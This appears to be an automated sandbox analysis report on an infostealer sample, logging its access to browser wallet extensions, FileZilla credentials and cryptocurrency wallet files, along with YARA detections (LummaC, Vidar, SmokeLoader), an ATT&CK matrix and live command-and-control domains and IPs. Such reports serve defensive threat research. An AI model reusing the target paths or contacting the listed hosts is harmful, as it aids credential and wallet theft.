                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: Yara matchFile source: 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 38F9.exe PID: 7932, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: katB4C0.tmp PID: 4480, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected CryptOne packer
                Source: Yara matchFile source: 0000000A.00000002.2305592154.0000000004379000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: 38F9.exe PID: 7932, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Yara detected SmokeLoader
                Source: Yara matchFile source: 00000005.00000002.1969820013.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1740978999.00000000049F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3994237528.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1740710634.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3994385384.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1969780302.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Yara detected Vidar
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Yara detected Vidar stealer
                Source: Yara matchFile source: 10.2.D818.exe.4570000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.2560000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.4347719.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.2560000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.4347719.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.4570000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2306037473.0000000004570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2305075541.0000000002560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: D818.exe PID: 7224, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: katB4C0.tmp PID: 4480, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBE0C40 sqlite3_bind_zeroblob,11_2_6CBE0C40
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBE0D60 sqlite3_bind_parameter_name,11_2_6CBE0D60
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB08EA0 sqlite3_clear_bindings,11_2_6CB08EA0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBE0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,11_2_6CBE0B40
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB06410 bind,WSAGetLastError,11_2_6CB06410
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB060B0 listen,WSAGetLastError,11_2_6CB060B0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB0C030 sqlite3_bind_parameter_count,11_2_6CB0C030
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB06070 PR_Listen,11_2_6CB06070
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB0C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,11_2_6CB0C050
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CA922D0 sqlite3_bind_blob,11_2_6CA922D0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB063C0 PR_Bind,11_2_6CB063C0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB09480 sqlite3_bind_null,11_2_6CB09480
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB094F0 sqlite3_bind_text16,11_2_6CB094F0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB094C0 sqlite3_bind_text,11_2_6CB094C0

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		14
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Shared Modules                		Boot or Logon Initialization Scripts812
                Process Injection                		3
                Obfuscated Files or Information                		1
                Credentials in Registry                		12
                File and Directory Discovery                		Remote Desktop Protocol41
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)Logon Script (Windows)2
                Software Packing                		Security Account Manager37
                System Information Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell                		Login HookLogin Hook1
                DLL Side-Loading                		NTDS1
                Network Share Discovery                		Distributed Component Object Model2
                Clipboard Data                		125
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                File Deletion                		LSA Secrets551
                Security Software Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading                		Cached Domain Credentials22
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job812
                Process Injection                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Hidden Files and Directories                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447652 Sample: 2.exe Startdate: 26/05/2024 Architecture: WINDOWS Score: 100 61 whispedwoodmoodsksl.shop 2->61 63 steamcommunity.com 2->63 65 dbfhns.in 2->65 89 Snort IDS alert for network traffic 2->89 91 Multi AV Scanner detection for domain / URL 2->91 93 Found malware configuration 2->93 95 15 other signatures 2->95 11 2.exe 2->11         started        14 jssrvvh 2->14         started        16 jssrvvh 2->16         started        signatures3 process4 signatures5 121 Detected unpacking (changes PE section rights) 11->121 123 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->123 125 Maps a DLL or memory area into another process 11->125 18 explorer.exe 64 7 11->18 injected 127 Antivirus detection for dropped file 14->127 129 Multi AV Scanner detection for dropped file 14->129 131 Machine Learning detection for dropped file 14->131 133 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->133 135 Checks if the current machine is a virtual machine (disk enumeration) 16->135 137 Creates a thread in another existing process (thread injection) 16->137 process6 dnsIp7 67 dbfhns.in 185.18.245.58, 49736, 49737, 49738 UNINETAZ Azerbaijan 18->67 69 23.145.40.124, 49750, 80 SURFAIRWIRELESS-IN-01US Reserved 18->69 71 3 other IPs or domains 18->71 43 C:\Users\user\AppData\Roaming\jssrvvh, PE32 18->43 dropped 45 C:\Users\user\AppData\Local\Temp\D818.exe, PE32 18->45 dropped 47 C:\Users\user\AppData\Local\Temp\38F9.exe, PE32 18->47 dropped 49 C:\Users\user\...\jssrvvh:Zone.Identifier, ASCII 18->49 dropped 97 System process connects to network (likely due to code injection or exploit) 18->97 99 Benign windows process drops PE files 18->99 101 Deletes itself after installation 18->101 103 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->103 23 D818.exe 1 18->23         started        27 38F9.exe 18->27         started        file8 signatures9 process10 dnsIp11 51 C:\Users\user\AppData\Local\...\katB4C0.tmp, PE32 23->51 dropped 105 Machine Learning detection for dropped file 23->105 107 Contains functionality to inject code into remote processes 23->107 109 Writes to foreign memory regions 23->109 117 3 other signatures 23->117 30 katB4C0.tmp 1 45 23->30         started        73 whispedwoodmoodsksl.shop 188.114.96.3, 443, 49744, 49746 CLOUDFLARENETUS European Union 27->73 75 185.235.137.54, 49754, 80 AFRARASAIR Iran (ISLAMIC Republic Of) 27->75 111 Antivirus detection for dropped file 27->111 113 Multi AV Scanner detection for dropped file 27->113 115 Detected unpacking (changes PE section rights) 27->115 119 5 other signatures 27->119 35 WerFault.exe 21 27->35         started        file12 signatures13 process14 dnsIp15 77 steamcommunity.com 23.199.218.33, 443, 49767 AKAMAI-ASUS United States 30->77 79 65.109.242.59, 443, 49768, 49771 ALABANZA-BALTUS United States 30->79 53 C:\Users\user\AppData\...\softokn3[1].dll, PE32 30->53 dropped 55 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 30->55 dropped 57 C:\Users\user\AppData\...\mozglue[1].dll, PE32 30->57 dropped 59 10 other files (6 malicious) 30->59 dropped 81 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 30->81 83 Found many strings related to Crypto-Wallets (likely being stolen) 30->83 85 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 30->85 87 5 other signatures 30->87 37 cmd.exe 30->37         started        file16 signatures17 process18 process19 39 conhost.exe 37->39         started        41 timeout.exe 37->41         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                2.exe39%ReversingLabs
                2.exe43%VirustotalBrowse
                2.exe100%AviraHEUR/AGEN.1311176
                2.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\38F9.exe100%AviraTR/AVI.AceCrypter.javlp
                C:\Users\user\AppData\Roaming\jssrvvh100%AviraHEUR/AGEN.1311176
                C:\Users\user\AppData\Local\Temp\38F9.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\jssrvvh100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\D818.exe100%Joe Sandbox ML
                C:\ProgramData\FIEGCBKEGCFC\freebl3.dll0%ReversingLabs
                C:\ProgramData\FIEGCBKEGCFC\mozglue.dll0%ReversingLabs
                C:\ProgramData\FIEGCBKEGCFC\msvcp140.dll0%ReversingLabs
                C:\ProgramData\FIEGCBKEGCFC\nss3.dll0%ReversingLabs
                C:\ProgramData\FIEGCBKEGCFC\softokn3.dll0%ReversingLabs
                C:\ProgramData\FIEGCBKEGCFC\vcruntime140.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\38F9.exe96%ReversingLabsWin32.Spyware.Lummastealer
                C:\Users\user\AppData\Local\Temp\katB4C0.tmp4%ReversingLabs
                C:\Users\user\AppData\Roaming\jssrvvh39%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                whispedwoodmoodsksl.shop17%VirustotalBrowse
                steamcommunity.com0%VirustotalBrowse
                dbfhns.in5%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://aka.ms/odirmr0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli0%URL Reputationsafe
                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
                http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                https://www.youtube.com0%URL Reputationsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
                https://wns.windows.com/L0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;0%URL Reputationsafe
                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
                https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%URL Reputationsafe
                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%URL Reputationsafe
                https://lv.queniujq.cn0%URL Reputationsafe
                https://www.youtube.com/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
                https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                https://checkout.steampowered.com/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                https://outlook.com_0%URL Reputationsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%URL Reputationsafe
                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%URL Reputationsafe
                https://help.steampowered.com/en/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=0%URL Reputationsafe
                http://schemas.micro0%URL Reputationsafe
                https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v0%URL Reputationsafe
                http://x1.c.lencr.org/00%URL Reputationsafe
                http://x1.i.lencr.org/00%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p0%URL Reputationsafe
